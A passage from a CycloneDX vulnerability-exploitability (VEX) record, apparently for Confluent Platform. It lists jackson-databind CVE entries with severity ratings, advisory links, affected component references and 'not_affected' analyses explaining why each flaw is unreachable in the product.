        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#f9ce033a-5ea3-4101-b59b-cee17d306ea0"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ed5fabfc-04cb-4427-8f07-5398c583b7dd"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#e53ba2a0-de41-40c2-947e-9d11154eb259"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#fe312216-1e47-4bc6-ac95-a59624912519"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f2bf07d6-7d44-418f-b71f-65330e8185bf"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e73e80f8-d184-4c12-baca-95731306f31d"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f70b3f98-3fc9-4eca-b669-1ebe8c7b69b3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fc2f580b-2a5d-4096-8752-c8db80a300fe"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fddb0645-966c-470e-94ec-50262d724477"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f759b9f7-33a7-4450-8002-24f702debfeb"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#d6d592d5-31c9-463e-82a0-4409fb3a9b47"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#adc9aa3d-91b0-4427-9a42-2d57fc5a6e9b"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f9d58eae-2579-44ef-9b86-a870794e23be"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#59fed5a4-f6ad-4bf4-9173-0bc11d198b91"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#d4fa54fd-6bfb-4a0a-b99c-b9943c7e58b4"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#d7135540-02ce-4c73-be61-129aec36bb11"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#a7e5df3b-5d7a-4f08-9108-3e09c68a3a11"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Confluent Platform does not deserialize untrusted JSON using class-based polymorphic typing; the only class-based sites are the Trogdor test tool (not in the deployed runtime) and the OAuth JwtIssuer selected by trusted broker configuration, so the PolymorphicTypeValidator bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54513",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        184
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.10.0 until 2.18.8, 2.21.4, and 3.1.4, BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray() allowlists any array type based only on clazz.isArray(), without validating the array's component (element) type against the configured allowlist. A PTV built with allowIfSubTypeIsArray() plus an explicit concrete-type allowlist therefore still permits EvilType[] even though EvilType is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54513"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36839"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40895"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41951"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43218"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43400"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44061"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44062"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44063"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44065"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44271"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48095"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48151"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50846"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50847"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50848"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50849"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54622"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54513"
        },
        {
          "url": "https://bugzilla.redhat.com/2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492015"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54512"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54513"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-43400.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:40895"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/01d1692c8d0ed03e51a0e3c4f8a9e6908e4931e5"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/24529da29fdf46ff94ca38de9ebf31cd188f5e8e"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5981"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5983"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5984"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-rmj7-2vxq-3g9f"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54513.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-43400.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54513"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54513.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54513"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-08-14T13:19:03+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:032cfb2d-9f0d-4398-9524-dc61f4303447/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#6aadec1e-67f1-4295-a31f-0cca5e9c6a75"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#da81c428-bdc3-4b4e-95a0-9ea1c83fde9b"
        },
        {
          "ref": "urn:cdx:18887482-e12e-40ec-af4e-627193cbd5ab/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#c5274910-28c8-433d-a4d4-d0b636683cd4"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#f9ce033a-5ea3-4101-b59b-cee17d306ea0"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ed5fabfc-04cb-4427-8f07-5398c583b7dd"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#e53ba2a0-de41-40c2-947e-9d11154eb259"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#fe312216-1e47-4bc6-ac95-a59624912519"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f2bf07d6-7d44-418f-b71f-65330e8185bf"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e73e80f8-d184-4c12-baca-95731306f31d"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f70b3f98-3fc9-4eca-b669-1ebe8c7b69b3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fc2f580b-2a5d-4096-8752-c8db80a300fe"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fddb0645-966c-470e-94ec-50262d724477"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f759b9f7-33a7-4450-8002-24f702debfeb"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#d6d592d5-31c9-463e-82a0-4409fb3a9b47"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#adc9aa3d-91b0-4427-9a42-2d57fc5a6e9b"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f9d58eae-2579-44ef-9b86-a870794e23be"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#59fed5a4-f6ad-4bf4-9173-0bc11d198b91"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#d4fa54fd-6bfb-4a0a-b99c-b9943c7e58b4"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#d7135540-02ce-4c73-be61-129aec36bb11"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#a7e5df3b-5d7a-4f08-9108-3e09c68a3a11"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product does not enable class-based polymorphic deserialization (default typing, or @JsonTypeInfo with Id.CLASS/Id.MINIMAL_CLASS) on untrusted input, so the array-subtype PolymorphicTypeValidator bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54514",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        918
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.0.0 until 2.18.8, 2.21.4, and 3.1.4, JDKFromStringDeserializer constructed InetSocketAddress with new InetSocketAddress(host, port), which performs eager DNS name resolution for hostname inputs at deserialization time. An application that binds untrusted JSON into a type containing an InetSocketAddress field issues an attacker-chosen DNS query during readValue, before any application-level validation or connect logic. The fix uses InetSocketAddress.createUnresolved(host, port), deferring DNS to an explicit connect. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54514"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54514"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/1f5a1037b1e9e05920e755cb35f198bcd46667e4"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5951"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-hgj6-7826-r7m5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54514"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54514"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T20:55:09+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:032cfb2d-9f0d-4398-9524-dc61f4303447/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#6aadec1e-67f1-4295-a31f-0cca5e9c6a75"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#da81c428-bdc3-4b4e-95a0-9ea1c83fde9b"
        },
        {
          "ref": "urn:cdx:18887482-e12e-40ec-af4e-627193cbd5ab/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#c5274910-28c8-433d-a4d4-d0b636683cd4"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#f9ce033a-5ea3-4101-b59b-cee17d306ea0"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ed5fabfc-04cb-4427-8f07-5398c583b7dd"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#e53ba2a0-de41-40c2-947e-9d11154eb259"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#fe312216-1e47-4bc6-ac95-a59624912519"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f2bf07d6-7d44-418f-b71f-65330e8185bf"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e73e80f8-d184-4c12-baca-95731306f31d"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f70b3f98-3fc9-4eca-b669-1ebe8c7b69b3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fc2f580b-2a5d-4096-8752-c8db80a300fe"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fddb0645-966c-470e-94ec-50262d724477"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f759b9f7-33a7-4450-8002-24f702debfeb"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#d6d592d5-31c9-463e-82a0-4409fb3a9b47"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#adc9aa3d-91b0-4427-9a42-2d57fc5a6e9b"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f9d58eae-2579-44ef-9b86-a870794e23be"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#59fed5a4-f6ad-4bf4-9173-0bc11d198b91"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#d4fa54fd-6bfb-4a0a-b99c-b9943c7e58b4"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#d7135540-02ce-4c73-be61-129aec36bb11"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#a7e5df3b-5d7a-4f08-9108-3e09c68a3a11"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. no attacker-controlled JSON is deserialized into a java.net.InetSocketAddress (the type appears only in networking code, not bound via jackson), so the eager-DNS-resolution SSRF path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54515",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.8.0 until 2.18.9, 2.21.5, and 3.1.4, in BeanDeserializerBase.createContextual(), per-property @JsonIgnoreProperties exclusions are applied by _handleByNameInclusion(), producing a contextual deserializer whose BeanPropertyMap has the ignored properties removed. The subsequent per-property case-insensitivity block (triggered by @JsonFormat(ACCEPT_CASE_INSENSITIVE_PROPERTIES)) rebuilds from this._beanProperties (the original, unfiltered map) instead of contextual._beanProperties, then overwrites the filtered map \u2014 restoring every property _handleByNameInclusion had just removed. The ignored property becomes writable again. This vulnerability is fixed in 2.18.9, 2.21.5, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 3.1.4, 2.18.9, 2.21.5, 2.22.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54515"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/0e1b0b211f7a53baa62ba2f4c9bd006c7bf4d5fa"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5962"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5964"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5jmj-h7xm-6q6v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54515"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54515"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-29T13:38:59+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:032cfb2d-9f0d-4398-9524-dc61f4303447/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#6aadec1e-67f1-4295-a31f-0cca5e9c6a75"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#da81c428-bdc3-4b4e-95a0-9ea1c83fde9b"
        },
        {
          "ref": "urn:cdx:18887482-e12e-40ec-af4e-627193cbd5ab/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#c5274910-28c8-433d-a4d4-d0b636683cd4"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#f9ce033a-5ea3-4101-b59b-cee17d306ea0"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ed5fabfc-04cb-4427-8f07-5398c583b7dd"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#e53ba2a0-de41-40c2-947e-9d11154eb259"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#fe312216-1e47-4bc6-ac95-a59624912519"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f2bf07d6-7d44-418f-b71f-65330e8185bf"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e73e80f8-d184-4c12-baca-95731306f31d"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f70b3f98-3fc9-4eca-b669-1ebe8c7b69b3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fc2f580b-2a5d-4096-8752-c8db80a300fe"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fddb0645-966c-470e-94ec-50262d724477"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f759b9f7-33a7-4450-8002-24f702debfeb"
        },
        {
